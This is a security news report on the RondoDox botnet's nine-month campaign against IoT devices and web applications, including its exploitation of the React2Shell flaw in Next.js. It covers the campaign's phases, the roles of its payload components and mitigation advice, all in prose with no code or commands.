Cybersecurity researchers have uncovered a prolonged nine-month campaign that targeted Internet of Things (IoT) devices and web applications to recruit them into a botnet named RondoDox.
As of December 2025, threat actors have been observed exploiting the newly disclosed React2Shell vulnerability (CVE-2025-55182, CVSS 10.0) to gain unauthorized access to vulnerable systems, according to an analysis by CloudSEK.
React2Shell is a critical security flaw affecting React Server Components (RSC) and Next.js, enabling unauthenticated attackers to execute remote code on compromised devices. The Shadowserver Foundation reports approximately 90,300 systems remain exposed globally, with the highest concentration in the United States (68,400), followed by Germany (4,300), France (2,800), and India (1,500).
RondoDox, active since early 2025, has expanded its attack methods by incorporating additional N-day vulnerabilities, including CVE-2023-1389 and CVE-2025-24893. Prior analyses by Darktrace, Kaspersky, and VulnCheck have already highlighted its abuse of React2Shell for botnet propagation.
The RondoDox campaign progressed through three key phases before exploiting CVE-2025-55182:
- March – April 2025: Initial reconnaissance and manual vulnerability scanning
- April – June 2025: Daily large-scale scanning of web apps such as WordPress, Drupal, Struts2, and IoT devices like Wavlink routers
- July – Early December 2025: Hourly automated deployment on a massive scale
In December 2025, attackers scanned for vulnerable Next.js servers and deployed multiple malicious components, including cryptocurrency miners (“/nuts/poop”), a botnet loader and health checker (“/nuts/bolts”), and a Mirai botnet variant (“/nuts/x86”).
The “/nuts/bolts” tool terminates competing malware and coin miners before downloading the main bot binary from its command-and-control (C2) server. Some variants also remove traces of previous infections, Docker payloads, cron jobs, and set persistence via “/etc/crontab”.
CloudSEK noted, “The tool continuously monitors /proc and kills any non-whitelisted processes every 45 seconds, effectively preventing reinfection by rival malware.”
To reduce the threat, organizations are urged to update Next.js to a patched version, isolate IoT devices on dedicated VLANs, deploy Web Application Firewalls (WAFs), monitor for suspicious processes, and block known C2 servers.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
